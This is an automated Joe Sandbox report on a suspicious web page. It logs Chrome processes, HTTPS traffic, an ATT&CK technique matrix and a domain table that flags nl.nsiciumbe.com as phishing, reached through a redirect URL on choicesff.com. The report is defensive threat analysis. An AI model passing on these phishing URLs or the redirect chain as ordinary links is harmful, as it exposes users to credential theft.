Source: chromecache_71.2.dr, chromecache_74.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: classification engineClassification label: mal52.win@21/32@36/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2200,i,14020259663435035304,8067086571185924884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://yancesybros.com/WHF9842BVD.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2200,i,14020259663435035304,8067086571185924884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://yancesybros.com/WHF9842BVD.html0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://yancesybros.com/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
https://yancesybros.com/cdn-cgi/challenge-platform/h/g/flow/ov1/121176288:1732559265:7lJ7n7BdOJx3cf64Km5o6XhhTjh1yazfNFmmaS1TOb0/8e83c9569b4eefa7/NVxlqQ0CuOO_mq_ADX6BzRNv15dryg_MCjBHsRZiF_M-1732560228-1.2.1.1-BSHpMKKlNjDcEJtMM5Iqnf.JCyWX7aLd0e6uY.qTM_J3gynsL2deklactUUpBCnz0%Avira URL Cloudsafe
https://yancesybros.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8e83c9569b4eefa70%Avira URL Cloudsafe
https://nl.nsiciumbe.com/favicon.ico100%Avira URL Cloudphishing
https://yancesybros.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js?0%Avira URL Cloudsafe
https://yancesybros.com/favicon.ico0%Avira URL Cloudsafe
https://choicesff.com/res444.php?2-68747470733a2f2f4e4c2e6e73696369756d62652e636f6d2f615871725148742f-moray0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
nl.nsiciumbe.com
104.21.63.27
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.194.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.25.14
        truefalse
          high
          challenges.cloudflare.com
          104.18.94.41
          truefalse
            high
            yancesybros.com
            172.67.189.74
            truefalse
              unknown
              www.google.com
              142.250.181.68
              truefalse
                high
                googlehosted.l.googleusercontent.com
                172.217.19.225
                truefalse
                  high
                  choicesff.com
                  69.49.245.172
                  truefalse
                    unknown
                    blogger.googleusercontent.com
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://choicesff.com/res444.php?2-68747470733a2f2f4e4c2e6e73696369756d62652e636f6d2f615871725148742f-morayfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/717006795:1732559173:kR_0HaZjcMZ7NfcZjqJuMDbFTXd9SIuUQzr_to9VflA/8e83c97ff9621a48/QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxavfalse
                        high
                        https://yancesybros.com/favicon.icofalse
                        • Avira URL Cloud: safe
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8e83c97ff9621a48/1732560240060/ec9946d522a774066924225e9979f9a285d0363b428f53c5859ec557411cd08f/gqZRZaI8vUHtMGSfalse
                          high
                          https://a.nel.cloudflare.com/report/v4?s=3c6QTTvejV081hWYQg2nYd3f1J%2FkO%2F7al7UIK1r9Qa6a%2FYTKquwi7RMLTpYKTruLukdtPuMi4Fnq69aCqjwmEx98A%2FQcH75wH7Mupwi51mF5PLQ6bKl7EveK4k%2Fha03iwe8%3Dfalse
                            high
                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                              high
                              https://yancesybros.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8e83c9569b4eefa7false
                              • Avira URL Cloud: safe
                              unknown
                              https://yancesybros.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://yancesybros.com/WHF9842BVD.htmlfalse
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e83c97ff9621a48&lang=autofalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                    high
                                    https://yancesybros.com/cdn-cgi/challenge-platform/h/g/flow/ov1/121176288:1732559265:7lJ7n7BdOJx3cf64Km5o6XhhTjh1yazfNFmmaS1TOb0/8e83c9569b4eefa7/NVxlqQ0CuOO_mq_ADX6BzRNv15dryg_MCjBHsRZiF_M-1732560228-1.2.1.1-BSHpMKKlNjDcEJtMM5Iqnf.JCyWX7aLd0e6uY.qTM_J3gynsL2deklactUUpBCnzfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/false
                                      high
                                      https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.pngfalse
                                        high
                                        https://yancesybros.com/WHF9842BVD.html?__cf_chl_rt_tk=Dveq2bajeb4.68juqKcEwLAC3uO_Xxj5VhibRkg9Lpo-1732560228-1.0.1.1-EQcS5msdFBnN_w.DEowher7hBFNGCCOYXT25SAX1UmYfalse
                                          unknown
                                          https://a.nel.cloudflare.com/report/v4?s=QenT1uH9OoSpHete%2BQQiHKTgNBfukx%2FXYGk9UxFsUG0WGJfkaYgxdBu1LuP5yZqNoShH%2FqyOiZVX3xU8FGE9TzExwaq%2Bx5dVMm8zIX5qZLYGahygqYm9twgG1mKZONogb0Y%3Dfalse
                                            high
                                            https://a.nel.cloudflare.com/report/v4?s=xyifoI35i%2FMJzlipwl%2FxusHBjg2%2BqvOlnGIX%2Bba20MeoFKI90K%2FbtfKZq3i%2BwaJVe9%2BdFyCFH8%2FD5FUH7Ij8YJTyFni80eprsSggv5cpQwS8c2zSGBRfNbNopSqqvi3wKYM%3Dfalse
                                              high
                                              https://nl.nsiciumbe.com/aXqrQHt/false
                                                unknown
                                                https://nl.nsiciumbe.com/favicon.icofalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8e83c97ff9621a48/1732560240060/F7F6o63uyBc_7o8false
                                                    high
                                                    https://yancesybros.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js?false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.17.24.14
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.18.94.41
                                                    challenges.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    69.49.245.172
                                                    choicesff.comUnited States
                                                    46606UNIFIEDLAYER-AS-1USfalse
                                                    104.18.95.41
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    172.217.19.225
                                                    googlehosted.l.googleusercontent.comUnited States
                                                    15169GOOGLEUSfalse
                                                    172.67.189.74
                                                    yancesybros.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    239.255.255.250
                                                    unknownReserved
                                                    unknownunknownfalse
                                                    104.21.63.27
                                                    nl.nsiciumbe.comUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    151.101.66.137
                                                    unknownUnited States
                                                    54113FASTLYUSfalse
                                                    142.250.181.68
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    35.190.80.1
                                                    a.nel.cloudflare.comUnited States
                                                    15169GOOGLEUSfalse
                                                    151.101.194.137
                                                    code.jquery.comUnited States
                                                    54113FASTLYUSfalse
                                                    104.17.25.14
                                                    cdnjs.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    IP
                                                    192.168.2.4
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1562625
                                                    Start date and time:2024-11-25 19:42:53 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 2m 55s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:browseurl.jbs
                                                    Sample URL:https://yancesybros.com/WHF9842BVD.html
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:7
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal52.win@21/32@36/14
                                                    EGA Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 216.58.208.227, 74.125.205.84, 172.217.19.238, 34.104.35.123, 199.232.214.172, 192.229.221.95, 142.250.181.74, 172.217.19.234, 142.250.181.42, 172.217.19.202, 172.217.21.42, 216.58.208.234, 172.217.17.42, 172.217.17.74, 142.250.181.138, 172.217.17.35
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: https://yancesybros.com/WHF9842BVD.html
                                                    No simulations
                                                    No context
                                                    No context
                                                    No context
                                                    No context
                                                    No context
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (11800), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):12579
                                                    Entropy (8bit):5.653836949117567
                                                    Encrypted:false
                                                    SSDEEP:192:TXEBj0jGzm2TDetnblLR4e4QW1HYnyZy6q5+ArwKM4kuuQo:TUZAGzm2TDetnb3nVW1HYEq5+A6
                                                    MD5:65C24930559E15F03415300ADBF7285C
                                                    SHA1:4829992D93A203C4AA196E98FCB9FB0A7D4F9E83
